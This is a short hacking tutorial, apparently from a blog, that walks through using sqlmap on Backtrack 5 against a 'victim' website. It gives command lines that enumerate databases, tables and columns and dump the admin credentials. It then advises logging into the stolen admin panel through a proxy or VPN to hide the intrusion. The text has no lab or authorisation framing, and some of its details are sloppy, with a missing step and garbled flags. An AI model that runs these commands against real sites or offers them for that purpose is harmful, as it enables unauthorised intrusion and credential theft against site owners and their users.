In my previous tutorial I have explained what is backtrack, now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.
1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal
2. Now find the vulnerable site. (well I already have vulnerable site)
3. Now type this command in the terminal and hit enter.(refer above figure)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs
4. Now you will get the database name of the website
Well I got the two database aj and information_schema we will select aj database.
5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables
6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
8. Now lets grab the columns from the admin table
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.